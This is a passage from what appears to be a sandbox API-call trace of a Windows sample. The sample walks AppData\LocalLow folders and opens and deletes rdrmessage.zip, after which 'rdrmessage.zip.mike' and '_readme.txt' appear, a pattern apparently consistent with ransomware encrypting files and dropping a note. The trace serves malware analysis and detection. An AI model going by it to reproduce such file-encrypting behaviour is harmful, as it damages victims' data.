cAlternateFileName="")) returned 1 [0147.765] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0147.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0147.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0147.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0147.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0147.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0147.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0147.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0147.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0147.767] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.767] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.767] CoTaskMemFree (pv=0x4e1c10) [0147.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0147.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0147.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0147.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.771] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0147.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0147.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0147.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0147.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0147.772] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.773] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.773] CoTaskMemFree (pv=0x4e1c10) [0147.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.774] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.774] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0147.774] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0147.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0147.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0147.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0147.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0147.776] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.776] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.776] CoTaskMemFree (pv=0x4e1c10) [0147.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0147.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0147.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0147.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0147.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0147.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0147.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d8) returned 1 [0147.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0147.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0147.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0147.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0147.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0147.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0147.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0147.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc8) returned 1 [0147.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc4) returned 1 [0147.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0147.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0147.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0147.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0147.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0147.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0147.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0147.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0147.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.802] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0147.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0147.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef54) returned 1 [0147.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef50) returned 1 [0147.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef64) returned 1 [0147.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef60) returned 1 [0147.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef6c) returned 1 [0147.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef68) returned 1 [0147.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0147.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0147.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0147.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0147.807] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", dwFileAttributes=0x80) returned 1 [0147.808] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip")) returned 1 [0147.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af060) returned 1 [0147.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af05c) returned 1 [0147.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef90) returned 1 [0147.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef8c) returned 1 [0147.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af114) returned 1 [0147.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x21619aa0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21619aa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.812] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x215f3940, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x215f3940, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21619aa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xa820, dwReserved0=0x0, dwReserved1=0x0, cFileName="rdrmessage.zip.mike", cAlternateFileName="RDRMES~1.MIK")) returned 1 [0147.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0147.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0147.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21619aa0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21619aa0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21619aa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0147.813] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee4c | out: lpFindFileData=0x2aee4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x21619aa0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x21619aa0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21619aa0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0147.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0d4) returned 1 [0147.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e0) returned 1 [0147.814] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0147.814] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0147.814] CoTaskMemFree (pv=0x4e1c10) [0147.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0cc) returned 1 [0147.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.816] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee04 | out: lpFindFileData=0x2aee04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0147.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af08c) returned 1 [0147.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af098) returned 1 [0147.817] SetThreadErrorMode (dwNewMode=0x1, 